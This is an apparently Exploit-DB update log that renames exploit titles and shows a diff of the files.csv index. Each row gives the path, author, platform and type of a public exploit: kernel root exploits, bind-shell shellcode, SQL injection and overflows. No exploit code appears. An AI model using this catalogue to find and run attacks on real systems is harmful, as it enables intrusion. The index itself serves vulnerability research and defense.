DB: 2016-07-23

3 new exploits

Mandrake Linux 8.2 - /usr/mail Local Exploit
/usr/mail (Mandrake Linux 8.2) - Local Exploit

Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Root Exploit (3)
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)

Linux Kernel 2.2 - (TCP/IP Weakness) Exploit
Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit

CDRecord's ReadCD - Local Root Privileges
CDRecord's ReadCD - Local Root Exploit

NetBSD FTPd / tnftpd Remote Stack Overflow PoC
NetBSD FTPd / Tnftpd - Remote Stack Overflow PoC

Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit
Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit

Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1)
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' ring0 Root Exploit (1)

Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (1)
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)

SimpNews 2.16.2 and Below Multiple SQL Injection Vulnerabilities
SimpNews <= 2.16.2 - Multiple SQL Injection Vulnerabilities
NetBSD 5.0 and below Hack GENOCIDE Environment Overflow proof of concept
NetBSD 5.0 and below Hack PATH Environment Overflow proof of concept
NetBSD <= 5.0 - Hack GENOCIDE Environment Overflow proof of concept
NetBSD <= 5.0 - Hack PATH Environment Overflow proof of concept

Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (2)
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)

Linux Kernel < 2.6.34 (Ubuntu 10.10) - CAP_SYS_ADMIN x86 Local Privilege Escalation Exploit (1)
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (1)

Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (2)

Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Info Leak Exploit
Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Information Leak Exploit

NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1)
NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1) - Exploit

NetBSD <= 1.4_OpenBSD <= 2.5_Solaris <= 7.0 profil(2)
NetBSD <= 1.4 / OpenBSD <= 2.5 /Solaris <= 7.0 profil(2) - Exploit

FreeBSD 3.4/4.0/5.0_NetBSD 1.4 Unaligned IP Option Denial of Service
FreeBSD 3.4/4.0/5.0 / NetBSD 1.4 - Unaligned IP Option Denial of Service

FreeBSD 2.2-4.2_NetBSD 1.2-4.5_OpenBSD 2.x ftpd glob() Buffer Overflow
FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - glob() Buffer Overflow

NetBSD 1.x TalkD User Validation
NetBSD 1.x TalkD - User Validation

FreeBSD 4.x_NetBSD 1.4.x/1.5.x/1.6_OpenBSD 3 pppd Arbitrary File Permission Modification Race Condition
FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition

Linux Kernel 2.4 - execve() System Call Race Condition PoC
Linux Kernel 2.4 - suid execve() System Call Race Condition PoC

Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index PoC (1)
Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1)

Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2)
Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Local Root Exploit (2)

NetBSD 3.1 Ftpd and Tnftpd Port Remote Buffer Overflow
NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow

OpenBSD 4.6 and NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service
OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service

Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.0/1/2 x64) - perf_swevent_init Local Root Exploit (3)
Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)

Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption
Mozilla Firefox SeaMonkey <= 3.6.10 / Thunderbird <= 3.1.4 - 'document.write' Memory Corruption

Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities
Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities

Linux Kernel <= 3.14.5 (RHEL/CentOS 7) - libfutex Local Root
Linux Kernel <= 3.14.5 (RHEL / CentOS 7) - 'libfutex' Local Root Exploit

NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow
NetBSD 5.1 - Multiple 'libc/net' Functions Stack Buffer Overflow

VSAT Sailor 900 - Remote Exploit

Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept)

Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - rootpipe Local Privilege Escalation
Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation

Apple OS X Entitlements Rootpipe Privilege Escalation
Apple OS X Entitlements - 'Rootpipe' Privilege Escalation

OS-X/x86-64 - /bin/sh Shellcode - NULL Byte Free (34 bytes)
OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes)

OS X Install.framework suid root Runner Binary Privilege Escalation
OS X Install.framework - suid root Runner Binary Privilege Escalation

Linux/MIPS Kernel 2.6.36 NetUSB - Remote Code Execution Exploit
Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution Exploit

Linux/x86-64 - bindshell (Pori: 5600) shellcode (81 bytes)
Linux/x86-64 - bindshell (Port 5600) shellcode (81 bytes)

Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Local Root Exploit

Exim 4 (Debian/Ubuntu) - Spool Local Root Privilege Escalation
Exim 4 (Debian / Ubuntu) - Spool Local Privilege Escalation

Windows 7-10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032)
Windows 7-10 and 2008-2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)

Internet Explorer 11 (on Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)
Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)

Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes)
Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes)
mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)
Apache 2.4.7 & PHP <= 7.0.2 - openssl_seal() Uninitialized Memory Code Execution

files.csv

@@ -38,7 +38,7 @@ id,file,description,date,author,platform,type,port
 37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0
 38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80
 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69
-40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit",2003-06-10,anonymous,linux,local,0
+40,platforms/linux/local/40.pl,"/usr/mail (Mandrake Linux 8.2) - Local Exploit",2003-06-10,anonymous,linux,local,0
 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution Exploit",2003-06-10,pokleyzz,linux,remote,80
 42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String Exploit",2003-06-11,ThreaT,windows,remote,25
 43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 - (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21
@@ -140,7 +140,7 @@ id,file,description,date,author,platform,type,port
 142,platforms/linux/local/142.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2)",2004-01-07,"Christophe Devine",linux,local,0
 143,platforms/linux/remote/143.c,"lftp <= 2.6.9 - Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0
 144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0
-145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Root Exploit (3)",2004-01-15,"Paul Starzetz",linux,local,0
+145,platforms/linux/local/145.c,"Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)",2004-01-15,"Paul Starzetz",linux,local,0
 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0
 148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
@@ -225,7 +225,7 @@ id,file,description,date,author,platform,type,port
 234,platforms/bsd/remote/234.c,"OpenBSD 2.6 / 2.7ftpd - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21
 235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0
 236,platforms/linux/dos/236.sh,"Redhat 6.1 / 6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0
-237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - (TCP/IP Weakness) Exploit",2001-01-02,Stealth,linux,remote,513
+237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit",2001-01-02,Stealth,linux,remote,513
 238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0
 239,platforms/solaris/remote/239.c,"wu-ftpd 2.6.0 - Remote Format Strings Exploit",2001-01-03,kalou,solaris,remote,21
 240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0
@@ -413,7 +413,7 @@ id,file,description,date,author,platform,type,port
 465,platforms/php/webapps/465.pl,"PHP-Nuke SQL Injection Edit/Save Message(s) Bug",2004-09-16,iko94,php,webapps,0
 466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Exploit",2004-09-16,"Luiz Fernando Camargo",linux,local,0
 468,platforms/windows/dos/468.c,"Pigeon Server <= 3.02.0143 - Denial of Service Exploit",2004-09-19,"Luigi Auriemma",windows,dos,0
-469,platforms/linux/local/469.c,"CDRecord's ReadCD - Local Root Privileges",2004-09-19,"Max Vozeler",linux,local,0
+469,platforms/linux/local/469.c,"CDRecord's ReadCD - Local Root Exploit",2004-09-19,"Max Vozeler",linux,local,0
 470,platforms/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission Exploit",2004-09-21,"Angelo Rosiello",linux,local,0
 471,platforms/windows/dos/471.pl,"Emulive Server4 7560 - Remote Denial of Service Exploit",2004-09-21,"GulfTech Security",windows,dos,66
 472,platforms/windows/remote/472.c,"Microsoft Windows - JPEG GDI+ Overflow Shellcoded Exploit",2004-09-22,FoToZ,windows,remote,0
@@ -2550,7 +2550,7 @@ id,file,description,date,author,platform,type,port
 2871,platforms/php/webapps/2871.txt,"LDU <= 8.x - (polls.php) Remote SQL Injection",2006-11-30,ajann,php,webapps,0
 2872,platforms/windows/local/2872.c,"VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit",2006-11-30,Expanders,windows,local,0
 2873,platforms/windows/local/2873.c,"AtomixMP3 <= 2.3 - (.M3U) Buffer Overflow Exploit",2006-11-30,"Greg Linares",windows,local,0
-2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / tnftpd Remote Stack Overflow PoC",2006-11-30,kingcope,bsd,dos,0
+2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / Tnftpd - Remote Stack Overflow PoC",2006-11-30,kingcope,bsd,dos,0
 2876,platforms/php/webapps/2876.txt,"DZCP (deV!L_z Clanportal) <= 1.3.6 - Arbitrary File Upload",2006-12-01,"Tim Weber",php,webapps,0
 2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection",2006-12-01,anonymous,php,webapps,0
 2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - (admin/FileServer.php) File Disclosure",2006-12-01,qobaiashi,php,webapps,0
@@ -8564,7 +8564,7 @@ id,file,description,date,author,platform,type,port
 9080,platforms/php/webapps/9080.txt,"Opial 1.0 - (albumid) Remote SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps,0
 9081,platforms/php/webapps/9081.txt,"Rentventory Multiple Remote SQL Injection Vulnerabilities",2009-07-02,Moudi,php,webapps,0
 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
-9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
+9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffié ",windows,dos,0
 9085,platforms/multiple/dos/9085.txt,"MySQL <= 5.0.45 = COM_CREATE_DB Format String PoC (Auth)",2009-07-09,kingcope,multiple,dos,0
 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b Arb. Shell Upload",2009-07-09,"ThE g0bL!N",php,webapps,0
@@ -9004,7 +9004,7 @@ id,file,description,date,author,platform,type,port
 9539,platforms/windows/dos/9539.py,"uTorrent <= 1.8.3 - (Build 15772) Create New Torrent Buffer Overflow PoC",2009-08-28,Dr_IDE,windows,dos,0
 9540,platforms/windows/local/9540.py,"HTML Creator & Sender <= 2.3 build 697 - Local BoF Exploit (SEH)",2009-08-28,Dr_IDE,windows,local,0
 9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow Exploit (Windows 2000)",2009-08-31,kingcope,windows,remote,21
-9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0
+9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0
 9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit (2)",2009-08-31,"Jon Oberheide",linux,local,0
 9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0
 9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - 'sock_sendpage()' Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0
@@ -9358,7 +9358,7 @@ id,file,description,date,author,platform,type,port
 9983,platforms/windows/local/9983.pl,"Xion Audio Player 1.0 121 m3u file Buffer Overflow",2009-10-16,"Dragon Rider",windows,local,0
 9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 xpas file BoF",2009-10-26,Dr_IDE,windows,local,0
 9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 heap Overflow / null pointer dereference",2009-10-17,"Adam Zabrocki",multiple,local,0
-14273,platforms/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (1)",2010-07-08,"Kristian Erik Hermansen",linux,local,0
+14273,platforms/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)",2010-07-08,"Kristian Erik Hermansen",linux,local,0
 9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial Of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060
 9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0
 9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat U3D File Invalid Array Index Remote",2009-11-09,"Felipe Andres Manzano",multiple,local,0
@@ -10962,7 +10962,7 @@ id,file,description,date,author,platform,type,port
 12004,platforms/php/webapps/12004.txt,"PHP Jokesite 2.0 - exec Command Exploit",2010-04-01,indoushka,php,webapps,0
 12005,platforms/php/webapps/12005.txt,"Profi Einzelgebots Auktions System Blind SQL Injection",2010-04-01,"Easy Laster",php,webapps,0
 12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde Remote Upload",2010-04-01,indoushka,php,webapps,0
-12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 and Below Multiple SQL Injection Vulnerabilities",2010-04-01,NoGe,php,webapps,0
+12007,platforms/php/webapps/12007.txt,"SimpNews <= 2.16.2 - Multiple SQL Injection Vulnerabilities",2010-04-01,NoGe,php,webapps,0
 12008,platforms/windows/local/12008.pl,"TugZip 3.5 Zip File Buffer Overflow",2010-04-01,Lincoln,windows,local,0
 12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - CSRF",2010-04-02,"pratul agrawal",php,webapps,0
 12010,platforms/windows/dos/12010.pl,"uTorrent WebUI <= 0.370 - Authorization header DoS Exploit",2010-04-02,"zombiefx darkernet",windows,dos,0
@@ -11539,8 +11539,8 @@ id,file,description,date,author,platform,type,port
 12648,platforms/php/webapps/12648.txt,"Joomla Component com_packages SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0
 12650,platforms/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow",2010-05-18,"Rad L. Sneak",windows,dos,0
 12651,platforms/php/webapps/12651.txt,"Lokomedia CMS (sukaCMS) Local File Disclosure",2010-05-18,"vir0e5 ",php,webapps,0
-12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD 5.0 and below Hack GENOCIDE Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0
+12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD <= 5.0 - Hack GENOCIDE Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0
-12653,platforms/netbsd_x86/dos/12653.sh,"NetBSD 5.0 and below Hack PATH Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0
+12653,platforms/netbsd_x86/dos/12653.sh,"NetBSD <= 5.0 - Hack PATH Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0
 12654,platforms/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection",2010-05-18,Pokeng,php,webapps,0
 12655,platforms/windows/dos/12655.txt,"QtWeb Browser 3.3 - DoS",2010-05-18,PoisonCode,windows,dos,0
 12656,platforms/php/webapps/12656.txt,"Battle Scrypt Shell Upload",2010-05-19,DigitALL,php,webapps,0
@@ -12595,7 +12595,7 @@ id,file,description,date,author,platform,type,port
 14336,platforms/php/webapps/14336.txt,"Joomla EasyBlog Persistent XSS",2010-07-12,Sid3^effects,php,webapps,0
 14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
 14338,platforms/php/webapps/14338.html,"GetSimple CMS 2.01 - (XSS/CSRF) Multiple Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
-14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation Local Root Exploit (2)",2010-07-12,anonymous,linux,local,0
+14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0
 14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
 14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass",2010-07-13,"David K",windows,webapps,0
 14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 - (wpd) Buffer Overflow PoC",2010-07-12,LiquidWorm,windows,dos,0
@@ -13803,7 +13803,7 @@ id,file,description,date,author,platform,type,port
 15913,platforms/php/webapps/15913.pl,"PhpGedView <= 4.2.3 - Local File Inclusion",2011-01-05,dun,php,webapps,0
 15961,platforms/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection",2011-01-10,Aodrulez,php,webapps,0
 15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple CSRF Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0
-15916,platforms/linux/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10) - CAP_SYS_ADMIN x86 Local Privilege Escalation Exploit (1)",2011-01-05,"Dan Rosenberg",linux,local,0
+15916,platforms/linux/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (1)",2011-01-05,"Dan Rosenberg",linux,local,0
 15919,platforms/windows/local/15919.pl,"Enzip 3.00 - Buffer Overflow Exploit",2011-01-06,"C4SS!0 G0M3S",windows,local,0
 15920,platforms/php/webapps/15920.txt,"F3Site 2011 alfa 1 - (XSS & CSRF) Multiple Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0
 15921,platforms/php/webapps/15921.txt,"phpMySport 1.4 - (SQLi & Auth Bypass & Path Disclosure) Multiple Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0
@@ -13822,7 +13822,7 @@ id,file,description,date,author,platform,type,port
 15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
 15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
 15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
-15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
+15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0
 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0
 15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
@@ -15703,7 +15703,7 @@ id,file,description,date,author,platform,type,port
 18077,platforms/windows/webapps/18077.txt,"hp data protector media operations <= 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0
 18078,platforms/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 Use After Free",2011-11-04,"Luigi Auriemma",windows,dos,0
 18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure Exploit",2011-11-04,"Todor Donev",hardware,remote,0
-18080,platforms/linux/local/18080.c,"Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Info Leak Exploit",2011-11-04,"Todor Donev",linux,local,0
+18080,platforms/linux/local/18080.c,"Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Information Leak Exploit",2011-11-04,"Todor Donev",linux,local,0
 18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x - (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0
 18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (3)",2011-11-04,Metasploit,windows,local,0
 18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
@@ -16650,7 +16650,7 @@ id,file,description,date,author,platform,type,port
 19258,platforms/solaris/local/19258.sh,"Sun Solaris <= 7.0 ff.core",1999-01-07,"John McDonald",solaris,local,0
 19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc Vulnerabilty",1999-02-03,xnec,linux,local,0
 19260,platforms/irix/local/19260.sh,"SGI IRIX <= 6.2 - /usr/lib/netaddpr",1997-05-09,"Jaechul Choe",irix,local,0
-19261,platforms/netbsd_x86/local/19261.txt,"NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1)",1998-06-27,Gutierrez,netbsd_x86,local,0
+19261,platforms/netbsd_x86/local/19261.txt,"NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1) - Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0
 19262,platforms/irix/local/19262.txt,"SGI IRIX <= 6.2 cdplayer",1996-11-21,"Yuri Volobuev",irix,local,0
 19263,platforms/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps,0
 19264,platforms/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,php,webapps,0
@@ -16814,7 +16814,7 @@ id,file,description,date,author,platform,type,port
 19444,platforms/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0",1999-08-05,"Stefan Lauda",hardware,remote,0
 19445,platforms/windows/dos/19445.txt,"Microsoft FrontPage Personal WebServer 1.0 PWS DoS",1999-08-08,Narr0w,windows,dos,0
 19446,platforms/multiple/dos/19446.pl,"WebTrends Enterprise Reporting Server 1.5 Negative Content Length DoS",1999-08-08,rpc,multiple,dos,0
-19447,platforms/multiple/local/19447.c,"NetBSD <= 1.4_OpenBSD <= 2.5_Solaris <= 7.0 profil(2)",1999-08-09,"Ross Harvey",multiple,local,0
+19447,platforms/multiple/local/19447.c,"NetBSD <= 1.4 / OpenBSD <= 2.5 /Solaris <= 7.0 profil(2) - Exploit",1999-08-09,"Ross Harvey",multiple,local,0
 19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Buffer Overflow",1999-08-03,UNYUN,windows,remote,0
 19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R - 'Topic' Buffer Overflow",1999-08-03,UNYUN,windows,remote,0
 19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 - Buffer Overflow",1999-08-08,UNYUN,windows,remote,0
@@ -17254,7 +17254,7 @@ id,file,description,date,author,platform,type,port
 19893,platforms/windows/remote/19893.c,"L-Soft Listserv 1.8 Web Archives Buffer Overflow",2000-05-01,"David Litchfield",windows,remote,0
 19894,platforms/windows/local/19894.txt,"Aladdin Knowledge Systems eToken 3.3.3 eToken PIN Extraction",2000-05-04,kingpin,windows,local,0
 19895,platforms/windows/remote/19895.txt,"NetWin DNews 5.3 Server Buffer Overflow",2000-03-01,Joey__,windows,remote,0
-19896,platforms/bsd/dos/19896.c,"FreeBSD 3.4/4.0/5.0_NetBSD 1.4 Unaligned IP Option Denial of Service",2000-05-04,y3t1,bsd,dos,0
